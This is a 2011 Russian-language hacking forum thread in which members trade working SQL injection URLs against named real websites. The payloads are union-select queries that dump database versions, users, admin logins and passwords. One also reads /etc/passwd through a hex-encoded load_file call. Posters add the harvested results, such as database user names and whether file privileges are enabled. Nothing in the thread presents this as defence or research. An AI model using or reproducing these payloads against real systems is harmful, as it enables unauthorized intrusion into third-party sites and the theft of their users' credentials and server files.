HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14291  
Старый 01.10.2011, 08:23
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от vaddd  
vaddd said:
http://computeremuzone.com/ficha.php?id=18 (60-80 юзеров онлайн)
крутил через havij, вручную не удалось... file_priv=y
Молодёжь нынче не та =/ Всё на программы перекладывают...

А по сути всё просто

Код:
Code:
http://computeremuzone.com/ficha.php?id=9999+union+select+version(),2,3,4,5,6--
Current User: crisis@cgi1501.int.bizland.net

Sql Version: 5.0.91-log

Current DB: emuzonedb

Data Bases: information_schema

emuzonedb
 
Ответить с цитированием

  #14292  
Старый 01.10.2011, 13:40
eclipse92
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: -11
По умолчанию

http://www.dkggroup.com/main.php?id=121'

http://www.dkggroup.com/main.php?id=-121+union+all+select+1,group_concat(Username,0x3a, Password,0x3a,UserGroup),3,4,5+from+uvp_Users
 
Ответить с цитированием

  #14293  
Старый 01.10.2011, 19:59
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

тИЦ: 1600

Код:
Code:
http://www.solvex.ru/hot/list.php?uid=-22+union+select+1,concat_ws(0x3a,version(),database(),user()),3--+
ver 5.1.39

db solvexmdb

user root@localhost

file_priv y, mq = on
 
Ответить с цитированием

  #14294  
Старый 01.10.2011, 21:40
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

тиц 850

первенец

Цитата:
Сообщение от None  
http://www.chelsi.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws%280x3a,email, password%29,4,5,6+from+users+--+
 
Ответить с цитированием

  #14295  
Старый 02.10.2011, 15:23
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Учреждение Российской Академии Наук Институт Биологического Приборостроения

http://www.ibp-ran.ru/catalog.php?trid=-203%20and%201=2%20union%20select%201,2,3,4,5,conca t_ws(char(58),@@version,user(),database(),@@versio n_compile_os),7,8,9,10,11,12,13,14,15,16+--

4.0.27-log pse101@v27.valuehost.ru pse101 portbld-freebsd7.1
 
Ответить с цитированием

  #14296  
Старый 02.10.2011, 15:35
Kerny
Познающий
Регистрация: 18.11.2009
Сообщений: 30
Провел на форуме:
86200

Репутация: 17
Отправить сообщение для Kerny с помощью ICQ
По умолчанию

Уязвимость существует в get запросе http://www.bryansktel.ru/news/?idnews=121 из-за недостаточной фильтрации переменной idnews.

select+concat(login,0x3a,password,0x3a,level)+from +admins+limit+0,1
 
Ответить с цитированием

  #14297  
Старый 03.10.2011, 02:01
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от None  
http://turkupon.ru/articles.php?root=1'+union+select+1,2,concat_ws(0x 3a,user(),version(),database()),4,5+--+
grafrru_turkupon@localhost:5.1.50-lk-log:grafrru_turkupon

Цитата:
Сообщение от None  
http://www.fishe.ru/diler.php?id=-10'+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database())+--+
fisheru@localhost:5.0.26-lk-log:fisheru

Цитата:
Сообщение от None  
http://kosmostom-omsk.ru/content.php?id=-21'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user (),version(),database()),9,0+--+
stomkosmos@localhost:5.0.26-log:stomkosmos

Цитата:
Сообщение от None  
http://leohaus.ru/object.php?id=-59'+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0,11,12,13,14,15,16,17+--+
leohausru@localhost:5.0.26-log:leohausru

Цитата:
Сообщение от None  
http://steklo55.ru/content.php?id=3'+and+(version()+like+'5%')+and(us er()+like+'steklo55ru%')+and+(database()+like+'ste klo55ru')+--+
Цитата:
Сообщение от None  
http://art-reklama.com.ua/passport.php?id=-170+union+select+1,load_file(0x2f6574632f706173737 764),3,4,concat_ws(0x3a,user(),version(),database( )),(select(@x)from(select(@x:=0x00),(select(0)from (information_schema.columns)where(table_schema!=0x 696e666f726d6174696f6e5f736368656d61)and(0x00)in(@ x:=concat(@x,0x3c62723e,table_schema,0x2e,table_na me,0x3a,column_name))))x)+--+
art@localhost:5.1.58:art-reklama
 
Ответить с цитированием

  #14298  
Старый 03.10.2011, 16:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

Код:
Code:
http://kaluga.pizdec.net/downloadmp3/mp3.php?album_id=-1635978+union+Select+1,2,3,4,5,6,group_concat%28table_name+separator+0x3a%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59+from+information_schema.tables+where+table_schema=0x7a697073--
version: 5.0.77

database: zips

user: zips@localhost

Код:
Code:
http://foroli4ka.org.ua/aforism/index.php?id=1+and+substring%28@@version,1,1%29=5 //true
 
Ответить с цитированием

  #14299  
Старый 05.10.2011, 14:45
N@b$ter
Новичок
Регистрация: 06.10.2009
Сообщений: 3
Провел на форуме:
76901

Репутация: 0
Отправить сообщение для N@b$ter с помощью ICQ
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,group_concat(column_name+separator+%27%3Cbr%3E%27)+from+information_schema.columns+where+table_schema=%27kitanaru%27+and+table_name=%27user_profile%27--+[/COLOR][/COLOR] 
version - 5.0.45

kitanaru@localhost

тиц - 20

пр - 3
 
Ответить с цитированием

  #14300  
Старый 05.10.2011, 15:06
good.god
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
Провел на форуме:
1298413

Репутация: 44
Отправить сообщение для good.god с помощью ICQ
По умолчанию

Код:
Code:
http://www.easyincometoday.co.uk/shop/ViewItem.php?ItemID=1'+and+1=0+union+select+1,group_concat(version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
5.0.51a-3ubuntu5:easyincome
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ